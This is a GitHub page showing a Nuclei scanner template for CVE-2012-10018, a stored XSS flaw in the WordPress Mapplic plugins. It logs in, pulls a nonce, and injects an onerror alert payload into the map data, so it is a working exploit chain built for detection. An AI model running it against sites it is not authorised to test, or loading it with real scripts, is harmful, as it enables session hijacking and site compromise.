forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2012-10018.yaml
More file actions
107 lines (93 loc) · 3.92 KB
/
CVE-2012-10018.yaml
File metadata and controls
107 lines (93 loc) · 3.92 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
id: CVE-2012-10018
info:
name: WordPress Mapplic <= 6.1 / Mapplic Lite <= 1.0 - Authenticated Stored XSS via SVG File Upload
author: KrE80r
severity: high
description: |
The Mapplic and Mapplic Lite plugins for WordPress are vulnerable to Stored Cross-Site Scripting via arbitrary URL injection in versions up to and including 6.1 and 1.0 respectively. Authenticated users with author-level permissions can inject arbitrary remote URLs for SVG map files. When a user views the map (admin panel or frontend page with shortcode), the browser fetches the SVG via jQuery .load() and inserts it into the DOM. If the SVG contains embedded JavaScript, it executes as XSS.
impact: |
An attacker with author-level access can inject URLs pointing to malicious SVG files containing JavaScript payloads. When any user views the map, the browser loads the SVG and executes the embedded scripts, potentially leading to session hijacking, privilege escalation, or complete site compromise.
remediation: |
Update Mapplic to version 7.0 or later, and Mapplic Lite to version 1.0.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-10018
- https://wpscan.com/vulnerability/7bdee32b-9036-4e13-9586-4d6a9a1159c6/
- https://patchstack.com/database/wordpress/plugin/mapplic-lite/vulnerability/wordpress-mapplic-lite-plugin-1-0-stored-cross-site-scripting-xss-injection-via-server-side-request-forgery-ssrf-vulnerability
- https://packetstormsecurity.com/files/161920/WordPress-Mapplic-6.1-SSRF-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id: CVE-2012-10018
cwe-id: CWE-79
epss-score: 0.00045
epss-percentile: 0.17483
cpe: cpe:2.3:a:mapplic:mapplic:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: mapplic
product: mapplic
tags: cve,cve2012,wordpress,wp-plugin,xss,mapplic,kev,vkev,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
GET /wp-admin/post-new.php?post_type=mapplic_map HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "name=\"_wpnonce\"","post_ID")
condition: and
internal: true
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([a-f0-9]+)"'
internal: true
- type: regex
name: post_id
part: body
group: 1
regex:
- 'name=.post_ID. value=.(\d+).'
internal: true
- raw:
- |
POST /wp-admin/post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce={{nonce}}&post_ID={{post_id}}&post_title=Test&mapplic-mapdata=%7B%22mapwidth%22%3A%22100%22%2C%22mapheight%22%3A%22100%22%2C%22levels%22%3A%5B%7B%22id%22%3A%22test%22%2C%22title%22%3A%22%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E%22%2C%22map%22%3A%22test.svg%22%7D%5D%7D&action=editpost&post_type=mapplic_map
matchers:
- type: dsl
dsl:
- status_code == 302
internal: true
- raw:
- |
GET /wp-admin/post.php?post={{post_id}}&action=edit HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "<img src=x onerror=alert(document.domain)>", "mapplic-mapdata")
condition: and